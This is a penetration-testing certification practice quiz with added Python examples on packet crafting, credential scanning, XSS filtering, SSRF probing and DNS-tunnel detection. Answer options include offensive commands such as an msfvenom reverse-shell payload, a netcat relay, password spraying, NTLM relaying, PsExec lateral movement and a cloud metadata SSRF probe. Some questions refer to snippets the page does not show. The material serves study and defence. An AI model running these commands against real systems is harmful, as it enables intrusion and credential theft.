
Pentest Test 1

Title of test:
Pentest Test 1

Description:
003 Pentest 1

Creation Date: 2026/03/03

Category: Others

Number of questions: 51

Content:

A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target. Which of the following should the tester use?. tcpreplay. Bluecrack. Scapy. tcpdump.
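What "custom flags and sequence numbers" means in practice, as an added example that is not part of the quiz: a TCP segment built field by field, with the checksum computed over the IPv4 pseudo-header, which is exactly what Scapy's IP(dst=...)/TCP(flags="SA", seq=...) layers do for you. tcpdump only reads packets and tcpreplay only replays captures; neither lets you set these fields. Addresses and ports are made up; actually sending the bytes needs a raw socket and root, which is left out.

```python
import socket
import struct

# Added example, not code from the quiz: build a TCP segment by hand with
# arbitrary flags and sequence/ack numbers, the same thing Scapy does for
# IP(dst=...)/TCP(sport=..., dport=..., flags="SA", seq=...). Addresses and
# ports in the usage section are made up.

TCP_FLAG_BITS = {"F": 0x01, "S": 0x02, "R": 0x04, "P": 0x08,
                 "A": 0x10, "U": 0x20, "E": 0x40, "C": 0x80}


def flags_to_int(flags):
    """'SA' -> 0x12; an unknown letter raises KeyError instead of being ignored."""
    value = 0
    for letter in flags:
        value |= TCP_FLAG_BITS[letter]
    return value


def int_to_flags(value):
    return "".join(name for name, bit in TCP_FLAG_BITS.items() if value & bit)


def ones_complement_checksum(data):
    """RFC 1071 checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip, dst_ip, tcp_length):
    # The TCP checksum also covers an IPv4 pseudo-header, so the addresses matter.
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip),
                       socket.inet_aton(dst_ip), 0, socket.IPPROTO_TCP, tcp_length)


def build_tcp_segment(src_ip, dst_ip, sport, dport, seq, ack, flags,
                      payload=b"", window=8192):
    """Return header+payload bytes with a correct checksum and no TCP options."""
    data_offset = 5  # header length in 32-bit words (20 bytes)
    offset_and_flags = (data_offset << 12) | flags_to_int(flags)
    header = struct.pack("!HHIIHHHH", sport, dport, seq & 0xFFFFFFFF,
                         ack & 0xFFFFFFFF, offset_and_flags, window, 0, 0)
    csum = ones_complement_checksum(
        _pseudo_header(src_ip, dst_ip, len(header) + len(payload)) + header + payload)
    header = header[:16] + struct.pack("!H", csum) + header[18:]
    return header + payload


def parse_tcp_segment(segment):
    """Decode the fixed 20-byte header into a dict (roughly what Scapy's .show() prints)."""
    (sport, dport, seq, ack, offset_and_flags,
     window, csum, urgent) = struct.unpack("!HHIIHHHH", segment[:20])
    header_len = (offset_and_flags >> 12) * 4
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": int_to_flags(offset_and_flags & 0xFF),
        "window": window, "checksum": csum, "urgent": urgent,
        "payload": segment[header_len:],
    }


def checksum_is_valid(src_ip, dst_ip, segment):
    """Summing the segment including its own checksum field must give zero."""
    return ones_complement_checksum(
        _pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


if __name__ == "__main__":
    seg = build_tcp_segment("10.0.0.5", "10.0.0.9", 40000, 80,
                            seq=0xDEADBEEF, ack=0, flags="SA", payload=b"hi")
    print(parse_tcp_segment(seg))
    print("checksum ok:", checksum_is_valid("10.0.0.5", "10.0.0.9", seg))
```

A segment with SYN+ACK set and a chosen sequence number is the building block of the classic probes (half-open handshakes, sequence prediction tests, RST injection) the question alludes to; the parser and checksum check are there so you can confirm the bytes mean what you intended before they leave the box.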

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?. The tester is conducting a web application test. The tester is assessing a mobile application. The tester is evaluating a thick client application. The tester is creating a threat model.

A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?. VM. IAST. DAST. SCA.

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent: Which of the following should the tester recommend in the report to best prevent this type of vulnerability?. Drop all excessive file permissions with chmod o-rwx. Ensure the application's request access logs are reviewed frequently. Disable the use of external entities. Implement a WAF to filter all incoming requests.

A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?. Shoulder surfing. Recon-ng. Social media. Password dumps.

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet: Which of the following changes is required?. The condition on line 6. The method on line 5. The import on line 1. The delimiter in line 3.

During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?. Golden Ticket. Kerberoasting. DCShadow. LSASS dumping.

While performing an internal assessment, a tester uses the following command: crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ Which of the following is the main purpose of the command?. To perform a pass-the-hash attack over multiple endpoints within the internal network. To perform common protocol scanning within the internal network. To perform password spraying on internal systems. To execute a command in multiple endpoints at the same time.

A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?. Port mirroring. Sidecar scanning. ARP poisoning. Channel scanning.

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?. Preserving artifacts. Reverting configuration changes. Keeping chain of custody. Exporting credential data.

A tester gains initial access to a server and needs to enumerate all corporate domain DNS records. Which of the following commands should the tester use?. dig +short A AAAA local.domain. nslookup local.domain. dig axfr @local.dns.server. nslookup -server local.dns.server local.domain *.

A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?. Sniffing. Banner grabbing. TCP/UDP scanning. Ping sweeps.

A penetration tester reviews a SAST vulnerability scan report. The following lines of code have been reported as vulnerable: Which of the following is the best method to remediate this vulnerability?. Implementing a logging framework. Removing the five code lines reported with issues. Initiating a secure coding-awareness program with all the developers. Documenting the vulnerability as a false positive.

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?. Burp Suite. Wireshark. Zed Attack Proxy. Metasploit.

A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?. attacker_host$ nmap -sT <target_cidr> | nc -n <compromised_host> 22. attacker_host$ mknod backpipe p ; nc -l -p 8000 0<backpipe | nc <target_cidr> 80 | tee backpipe. attacker_host$ nc -nlp 8000 | nc -n <target_cidr> ; nmap -sT 127.0.0.1 8000. attacker_host$ proxychains nmap -sT <target_cidr>.

A penetration tester is unable to identify the Wi-Fi SSID on a client's cell phone. Which of the following techniques would be most effective to troubleshoot this issue?. Sidecar scanning. Channel scanning. Stealth scanning. Static analysis scanning.

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?. SQL Injection. SSRF. XSS. Server-side Template injection.

A penetration tester attempts unauthorized entry to the company’s server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?. Plug Spinner. Bypassing. Decoding. Raking.

Which of the following technologies is most likely used with badge cloning? (Choose two.). NFC. RFID. Bluetooth. Modbus. Zigbee. CAN bus.

During a penetration test of a web application, the tester gains full access to the application's source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?. Run TruffleHog against a local clone of the application. Scan the live web application using Nikto. Perform a manual code review of the Git repository. Use SCA software to scan the application source code.

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?. Kiosk escape. Arbitrary code execution. Process hollowing. Library injection.

Given the following script: Which of the following is the penetration tester most likely trying to do?. Change the system's wallpaper based on the current user's preferences. Capture the administrator's password and transmit it to a remote server. Conditionally stage and execute a remote script. Log the internet browsing history for a systems administrator.

A penetration tester needs to collect information transmitted over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?. ntlmrelayx.py -t 192.168.1.0/24 -l 1234. nc -tulpn 1234 192.168.1.2. responder.py -I eth0 -wP. crackmapexec smb 192.168.1.0/24 -u "user" -p "pass123".

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?. regsvr32 /s /n /u C:\evil.xml. MSBuild.exe C:\evil.xml. mshta.exe C:\evil.xml. AppInstaller.exe C:\evil.xml.

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be specified in the rules of engagement?. Testing window. Terms of service. Authorization letter. Shared responsibilities.

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?. curl <url>?param=http://169.254.169.254/latest/meta-data/. curl '<url>?param=http://127.0.0.1/etc/passwd'. curl '<url>?param=<script>alert(1}<script>/'. curl <url>?param=http://127.0.0.1/.

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output: Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?. responder -I eth0 -dwv ; ntlmrelayx.py -smb2support -tf <target>. msf > use exploit/windows/smb/ms17_010_psexec ; msf > <set options> ; msf > run. hydra -L administrator -P /path/to/passwdlist smb://<target>. nmap --script smb-brute.nse -p 445 <target>.

A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: Which of the following attack types is most likely being used in the test?. MDK4. Smurf attack. FragAttack. SYN flood.

Which of the following describes the process of determining why a vulnerability scanner is not providing results?. Root cause analysis. Secure distribution. Peer review. Goal reprioritization.

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information: The client is concerned about the availability of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?. Server 1. Server 2. Server 3. Server 4.

A penetration tester attempts to run an automated web-application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output: Which of the following actions should the tester take to get the scans to work properly?. Modify the scanner to slow down the scan. Change the source IP with a VPN. Modify the scanner to only use HTTP GET requests. Modify the scanner user agent.

During an assessment, a penetration tester runs the following command: setspn.exe -Q */* Which of the following attacks is the penetration tester preparing for?. LDAP injection. Pass-the-hash. Kerberoasting. Dictionary.

While conducting an assessment, a penetration tester identifies the details for several unreleased products announced at a company-wide meeting. Which of the following attacks did the tester most likely use to discover this information?. Eavesdropping. Bluesnarfing. Credential harvesting. SQL injection attack.

A penetration tester wants to attack a server, exhausting its resources and making it unavailable to legitimate users. Which of the following attacks would be best to achieve this result?. IP spoofing. TCP hijacking. Port redirection. SYN flooding.

During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanism on that system. The tester also discovers the endpoint is part of an Active Directory local domain. The tester's main goal is to leverage credentials to authenticate into other systems within the Active Directory environment. Which of the following steps should the tester take to complete the goal?. Use Mimikatz to collect information about the accounts and try to authenticate in other systems. Use hashcat to crack a password for the local user on the compromised endpoint. Use Evil-WinRM to access other systems in the network with the endpoint credentials. Use Metasploit to create and execute a payload and try to upload the payload into other systems.

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?. Enable monitor mode using Aircrack-ng. Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes. Run KARMA to break the password. Research WIGLE.net for potential nearby client access points.

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?. IAST. SBOM. DAST. SAST.

A penetration tester reviews a SAST vulnerability scan report. The following vulnerability has been reported as high severity: The tester inspects the source file and finds the variable response is defined as a constant and is not referred to or used in other sections of the code. Which of the following describes how the tester should classify this reported vulnerability?. False negative. False positive. True positive. Low severity.

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?. Browser Exploitation Framework. Maltego. Metasploit. theHarvester.

A penetration tester gains access to a Linux computer system. The tester then attempts to enumerate user accounts, including the directories and user default shell. Which of the following commands should the tester use to enumerate user accounts?. cat /etc/shadow. ls /var/usr. ls /home. cat /etc/passwd.
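What the tester actually reads out of that file, as an added example that is not part of the quiz: a parser for the seven-field /etc/passwd format and the checks worth running on it (interactive shells, extra UID 0 accounts, empty password fields, hashes kept in the world-readable file instead of /etc/shadow). The file contents and the hash string are constructed for the example and come from no real host.

```python
# Added example, not from the quiz: parse /etc/passwd the way a tester reads it
# after cat'ing it. The file contents below are constructed for the example.

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
toor:x:0:0:second root:/root:/bin/sh
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
svc_backup:x:1001:1001::/srv/backup:/bin/false
bob::1002:1002::/home/bob:/bin/zsh
legacy:$1$saltsalt$qJH7zN4xYta3aEG9dfqo50:1003:1003::/home/legacy:/bin/bash
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
                  "/usr/bin/false", "/bin/sync"}


def parse_passwd(text):
    """Return one dict per entry; a malformed line raises instead of being skipped silently."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "passwd": passwd, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def interactive_accounts(entries):
    """Accounts whose shell allows an interactive login: the targets for password attacks."""
    return [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS]


def uid0_accounts(entries):
    """Any UID 0 account besides root is a classic backdoor indicator."""
    return [e["name"] for e in entries if e["uid"] == 0]


def passwordless_accounts(entries):
    """An empty password field means no password is required at all."""
    return [e["name"] for e in entries if e["passwd"] == ""]


def hash_in_passwd_accounts(entries):
    """Hashes stored directly in world-readable /etc/passwd instead of /etc/shadow."""
    return [e["name"] for e in entries if e["passwd"] not in ("", "x", "*", "!")]


def home_directories(entries):
    return {e["name"]: e["home"] for e in entries}


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", interactive_accounts(entries))
    print("uid 0:", uid0_accounts(entries))
    print("no password:", passwordless_accounts(entries))
    print("hash in passwd:", hash_in_passwd_accounts(entries))
```

/etc/shadow is the wrong answer in the question for a reason the code makes visible: the passwd file already gives the user list, home directories and shells, and a low-privilege shell can read it, while shadow is root-only and holds only the hashes.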

A client warns the assessment team that an ICS application is maintained by the manufacturer. Any tampering of the host could void the enterprise support terms of use. Which of the following techniques would be most effective to validate whether the application encrypts communications in transit?. Utilizing port mirroring on a firewall appliance. Installing packet capture software on the server. Reconfiguring the application to use a proxy. Requesting that certificate pinning be disabled.

While performing a penetration testing exercise, a tester executes the following command: PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe Which of the following best explains what the tester is trying to do?. Test connectivity using PsExec on the server01 using CMD.exe. Perform a lateral movement attack using PsExec. Send the PsExec binary file to the server01 using CMD.exe. Enable CMD.exe on the server01 through PsExec.

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command: findstr /SIM /C:"pass" *.txt *.cfg *.xml Which of the following is the penetration tester trying to enumerate?. Configuration files. Permissions. Virtual hosts. Secrets.
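The findstr command above and the TruffleHog question earlier on this page are two ends of the same search, so here is one added example (not part of the quiz, not TruffleHog's code) that shows the middle: a keyword match like /C:"pass" is the starting point, but a usable scanner also needs exact patterns for structured credentials and an entropy filter so that placeholders and test values do not drown the report. The file contents are constructed; the AWS key is Amazon's documented example value and the JSON web token is made up.

```python
import math
import re

# Added example, not from the quiz: the check behind findstr /C:"pass" or a
# TruffleHog-style scan, run over constructed file contents (no real credentials).

SAMPLE_FILES = {
    "app.cfg": "db_host=db01\ndb_pass=Summer2024!\n",
    "settings.xml": "<aws><accessKey>AKIAIOSFODNN7EXAMPLE</accessKey></aws>\n",
    "readme.txt": "Set PASSWORD=changeme before the first run.\n",
    "deploy.txt": "token = 'eyJhbGciOiJIUzI1NiJ9.e30.tZ6mJ1Y6hR1Q1kV5w8Y6tQ'\n",
    "test.txt": "password=aaaaaaaaaa\n",
}

# Credentials with a fixed shape are matched exactly, no entropy needed.
STRUCTURED_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
}

# Generic key=value / key: value assignments whose key smells like a secret.
ASSIGNMENT_PATTERN = re.compile(
    r"(?i)([A-Za-z0-9_.-]*(?:pass(?:word|wd)?|secret|token|api[_-]?key))"
    r"\s*[:=]\s*['\"]?([^\s'\"<>]{6,})")

PLACEHOLDERS = {"changeme", "password", "example", "redacted", "xxxxxxxx", "your_password"}
MIN_ENTROPY_BITS = 2.5  # per character; 'aaaaaaaaaa' scores 0.0, real passwords usually > 3


def shannon_entropy(s):
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())


def scan_text(name, text):
    """Return (file, line number, kind, value) for every likely secret in text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in STRUCTURED_PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append((name, lineno, kind, m.group(0)))
        for m in ASSIGNMENT_PATTERN.finditer(line):
            key, value = m.group(1), m.group(2)
            if value.lower() in PLACEHOLDERS or shannon_entropy(value) < MIN_ENTROPY_BITS:
                continue  # boilerplate or a test value, not worth a report line
            findings.append((name, lineno, f"assignment:{key.lower()}", value))
    return findings


def scan_files(files):
    results = []
    for name in sorted(files):
        results.extend(scan_text(name, files[name]))
    return results


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(finding)
```

On a real engagement the input is a directory walk (or a git history, which is where TruffleHog earns its keep: a secret deleted in a later commit is still in the repository), and every finding still gets verified by hand before it goes in the report.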

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?. Target 1: EPSS Score = 0.6 and CVSS Score = 4. Target 2: EPSS Score = 0.3 and CVSS Score = 2. Target 3: EPSS Score = 0.6 and CVSS Score = 1. Target 4: EPSS Score = 0.4 and CVSS Score = 4.5.

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system: ?/<sCRitP>aLeRt("pwned")</ScriPt> Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?. Arbitrary code execution; the affected computer should be placed on a perimeter network. SQL injection attack; should be detected and prevented by a web application firewall. Cross-site request forgery; should be detected and prevented by a firewall. XSS obfuscated; should be prevented by input sanitization.
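Why the answer pairs "obfuscated XSS" with input sanitization rather than a filter, as an added example that is not part of the quiz: a blocklist that looks for the literal string <script> is defeated by the mixed-case spelling in the payload above, a case-insensitive single-pass strip is defeated by nesting the tag inside itself, and encoding every HTML metacharacter at the output boundary stops both without trying to guess the attacker's spelling. The payloads are constructed (the mixed-case one follows the question's payload with the tag name spelled correctly), and the "browser" is a regular expression standing in for a real HTML parser.

```python
import html
import re

# Added example, not from the quiz: why a keyword blocklist fails against the
# mixed-case payload in the question, and what output encoding does instead.
# Payloads are constructed for the example.

MIXED_CASE_PAYLOAD = '<sCRiPt>aLeRt("pwned")</ScriPt>'
NESTED_PAYLOAD = '<scr<script>ipt>alert("pwned")</scr</script>ipt>'

# Stand-in for the browser's parser: a live <script ...> or </script> tag.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def blocklist_exact(value):
    """Broken control 1: strips only the lowercase spelling of the tag."""
    return value.replace("<script>", "").replace("</script>", "")


def blocklist_case_insensitive_once(value):
    """Broken control 2: case-insensitive, but a single pass reassembles nested tags."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def encode_for_html_body(value):
    """Correct control: encode every HTML metacharacter where the data hits the page."""
    return html.escape(value, quote=True)


def render_comment(comment, control):
    """Simulates a template dropping user text into an element body."""
    return '<p class="comment">' + control(comment) + "</p>"


def browser_would_run_script(rendered_html):
    return SCRIPT_TAG.search(rendered_html) is not None


if __name__ == "__main__":
    for name, control in [("exact blocklist", blocklist_exact),
                          ("case-insensitive strip", blocklist_case_insensitive_once),
                          ("output encoding", encode_for_html_body)]:
        for payload in (MIXED_CASE_PAYLOAD, NESTED_PAYLOAD):
            rendered = render_comment(payload, control)
            print(f"{name:24} executes={browser_would_run_script(rendered)}  {rendered}")
```

The encoding has to match the context the data lands in: html.escape is right for an element body or a quoted attribute, but a value written into a JavaScript string, a URL or a CSS property needs that context's encoder instead, which is why a WAF signature is a backstop rather than the fix.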

A penetration tester gains shell access to a Windows host. The tester needs to permanently turn off protections in order to install additional payload. Which of the following commands is most appropriate?. sc config <svc_name> start= disabled. sc query state= all. pskill <pid_svc_name>. net config <svc_name>.

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester’s attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?. Apply UTF-8 to the data and send over a tunnel to TCP port 25. Apply Base64 to the data and send over a tunnel to TCP port 80. Apply 3DES to the data and send over a tunnel UDP port 53. Apply AES-256 to the data and send over a tunnel to TCP port 443.

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool: Based on the output, which of the following services provides the best target for launching an attack?. Database. Remote access. Email. File sharing.

A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet. Given the following scanner information:
Server-side request forgery vulnerability in test.comptia.org
Reflected cross-site scripting vulnerability in test2.comptia.org
Publicly accessible storage system named static_comptia_assets
SSH port 22 open to the internet on test3.comptia.org
Open redirect vulnerability in test4.comptia.org
Which of the following attack paths should the tester prioritize first?. Synchronize all the information from the public bucket and scan it with TruffleHog. Run Pacu to enumerate permissions and roles within the cloud-based systems. Perform a full dictionary brute-force attack against the open SSH service using Hydra. Use the reflected cross-site scripting attack within a phishing campaign to attack administrators. Leverage the SSRF to gain access to credentials from the metadata service.
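Both SSRF questions on this page (the curl against 169.254.169.254 earlier, and the metadata-service attack path here) come down to one property: the application fetches a URL the attacker chose, and the instance metadata endpoint answers without authentication from inside the VM. The added example below is not part of the quiz or any vendor's code; the first half builds the probe URLs the tester injects, the second half is the allow-list check a fix needs, including the integer and hex spellings of the address that a naive string filter misses. The target URL, parameter name and allowed host are assumed.

```python
import ipaddress
from urllib.parse import quote, urlsplit

# Added example, not from the quiz. Part 1 builds the probe URLs a tester injects
# (the curl in the earlier question is the first of them); part 2 is the
# allow-list check the fix needs. Hostnames and URLs below are assumed.

METADATA_PROBES = [
    "http://169.254.169.254/latest/meta-data/",                         # AWS IMDSv1
    "http://[fd00:ec2::254]/latest/meta-data/",                         # AWS IMDS over IPv6
    "http://metadata.google.internal/computeMetadata/v1/",              # GCP (needs Metadata-Flavor: Google)
    "http://169.254.169.254/metadata/instance?api-version=2021-02-01",  # Azure (needs Metadata: true)
]


def build_probe_urls(base_url, param, probes=METADATA_PROBES):
    """URL-encode each probe into the injectable parameter, like the curl command."""
    return [f"{base_url}?{param}={quote(p, safe='')}" for p in probes]


# --- the server-side fix -----------------------------------------------------

BLOCKED_HOSTNAMES = {"localhost", "metadata", "metadata.google.internal"}


def host_to_ip(host):
    """Parse IP literals, including the integer/hex spellings used to dodge string filters."""
    host = host.strip("[]")
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        as_int = int(host, 0)  # 2852039166 and 0xa9fea9fe are both 169.254.169.254
    except ValueError:
        return None
    if 0 <= as_int <= 0xFFFFFFFF:
        return ipaddress.ip_address(as_int)
    return None


def is_safe_fetch_target(url, allowed_hosts):
    """Allow-list check for a server-side fetcher. Returns (ok, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = (parts.hostname or "").lower()
    if not host or host in BLOCKED_HOSTNAMES:
        return False, "hostname blocked"
    ip = host_to_ip(host)
    if ip is not None and (ip.is_private or ip.is_loopback or ip.is_link_local
                           or ip.is_multicast or ip.is_reserved or ip.is_unspecified):
        return False, f"{ip} is not an internet address"
    if host not in allowed_hosts:
        return False, "host not on allow-list"
    return True, "ok"


if __name__ == "__main__":
    for u in build_probe_urls("https://app.example.com/fetch", "param"):
        print(u)
    for u in ["http://169.254.169.254/latest/meta-data/", "http://0xa9fea9fe/",
              "http://[fd00:ec2::254]/", "https://cdn.example.net/logo.png"]:
        print(u, is_safe_fetch_target(u, {"cdn.example.net"}))
```

The check only covers what can be decided from the URL string. A production fetcher also has to resolve the hostname itself, apply the same address test to the resolved IP, and connect to that IP (otherwise a DNS name that resolves to 169.254.169.254, or rebinds to it on the second lookup, walks straight through), and it should refuse to follow redirects. On AWS, requiring IMDSv2 (a PUT to obtain a token before any GET) closes the simple curl-style probe even if the SSRF remains.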

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?. Covert data exfiltration. URL spidering. HTML scraping. DoS attack.
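What the networking team could have run to turn "more DNS traffic" into a finding, as an added example that is not part of the quiz: DNS tunnelling encodes the data into query names, so the tell is not volume alone but many distinct names under one parent domain whose leading label is long and looks random. The log lines are constructed; the "encoded chunks" are rotations of a 32-character alphabet standing in for base32 data, and the log format (time, client, name, type) is assumed.

```python
import math
from collections import defaultdict

# Added example, not from the quiz: a detector for the tunnel-shaped DNS traffic
# the networking team noticed. Log lines are constructed; the "encoded chunks"
# are rotations of a 32-character alphabet standing in for base32 data.

ALPHABET = "abcdefghijklmnopqrstuvwxyz012345"
TUNNEL_LABELS = [ALPHABET[i:] + ALPHABET[:i] for i in range(8)]

BENIGN_LINES = [  # a chatty but normal client: many names, all short hostnames
    "12:00:01 10.1.1.20 www.example.com A",
    "12:00:02 10.1.1.20 cdn.example.com A",
    "12:00:03 10.1.1.20 mail.example.com MX",
    "12:00:04 10.1.1.20 login.example.com A",
    "12:00:05 10.1.1.20 api.example.com A",
    "12:00:06 10.1.1.20 static.example.com A",
]
TUNNEL_LINES = [
    f"12:00:{10 + i:02d} 10.1.1.37 {label}.c{i}.tunnel.example.net TXT"
    for i, label in enumerate(TUNNEL_LABELS)
]
SAMPLE_DNS_LOG = "\n".join(BENIGN_LINES + TUNNEL_LINES) + "\n"


def shannon_entropy(s):
    if not s:
        return 0.0
    return -sum((s.count(c) / len(s)) * math.log2(s.count(c) / len(s)) for c in set(s))


def parse_dns_log(text):
    """Assumed log format: '<time> <client> <qname> <qtype>' per line."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype = line.split()
        records.append({"ts": ts, "client": client,
                        "qname": qname.rstrip(".").lower(), "qtype": qtype})
    return records


def parent_domain(qname):
    """Crude registrable-domain guess: last two labels (fine for the example)."""
    return ".".join(qname.split(".")[-2:])


def profile_queries(records):
    """Per (client, parent domain): distinct names, leading-label length and entropy, TXT share."""
    stats = defaultdict(lambda: {"names": set(), "label_len": [], "entropy": [],
                                 "txt": 0, "total": 0})
    for r in records:
        key = (r["client"], parent_domain(r["qname"]))
        first_label = r["qname"].split(".")[0]
        s = stats[key]
        s["names"].add(r["qname"])
        s["label_len"].append(len(first_label))
        s["entropy"].append(shannon_entropy(first_label))
        s["txt"] += r["qtype"] in ("TXT", "NULL")  # record types tunnels favour for downstream data
        s["total"] += 1
    return stats


def flag_tunnels(stats, min_names=5, min_label_len=20, min_entropy=3.5):
    """Flag keys whose names look like encoded data rather than hostnames."""
    flagged = []
    for key, s in stats.items():
        mean_len = sum(s["label_len"]) / s["total"]
        mean_entropy = sum(s["entropy"]) / s["total"]
        if len(s["names"]) >= min_names and mean_len >= min_label_len and mean_entropy >= min_entropy:
            flagged.append(key)
    return sorted(flagged)


if __name__ == "__main__":
    stats = profile_queries(parse_dns_log(SAMPLE_DNS_LOG))
    for key, s in stats.items():
        print(key, len(s["names"]), "names,", s["txt"], "TXT/NULL of", s["total"])
    print("flagged:", flag_tunnels(stats))
```

The benign client queries six distinct names and is left alone; the tunnel client is flagged on name count, label length and entropy together. Thresholds are tuned per environment (CDN and anti-spam lookups also produce long, random-looking labels), which is why the detector reports the parent domain rather than blocking on its own.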
